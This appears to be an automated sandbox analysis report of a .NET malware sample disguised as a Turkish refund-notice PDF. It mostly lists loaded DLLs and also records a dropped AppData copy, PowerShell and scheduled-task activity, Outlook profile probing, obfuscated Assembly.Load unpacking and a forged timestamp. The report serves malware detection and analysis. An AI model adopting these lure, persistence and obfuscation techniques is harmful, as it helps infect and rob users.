Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Section loaded: dpapi.dll

Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: NRtD.pdbSHA256 source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, SOFcFE.exe.1.dr
Source:	Binary string: NRtD.pdb source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, SOFcFE.exe.1.dr

Data Obfuscation

.NET source code contains potential unpacker

Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, authorizationForm.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: SOFcFE.exe.1.dr, authorizationForm.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.3eca230.0.raw.unpack, MainForm.cs	.Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, gCmqqu34SWaskVT2xX.cs	.Net Code: hOpvyx6Zcc System.Reflection.Assembly.Load(byte[])
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.5870000.4.raw.unpack, MainForm.cs	.Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, gCmqqu34SWaskVT2xX.cs	.Net Code: hOpvyx6Zcc System.Reflection.Assembly.Load(byte[])

Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe

Static PE information: 0xBF3BC221 [Tue Sep 1 20:22:57 2071 UTC]

Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Code function: 1_2_010A47B0 push esi; iretd	1_2_010A47B2
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Code function: 1_2_010A465B push edx; iretd	1_2_010A4662
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Code function: 1_2_010A4658 push edx; iretd	1_2_010A465A
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Code function: 1_2_010A46BB push edx; iretd	1_2_010A46BE
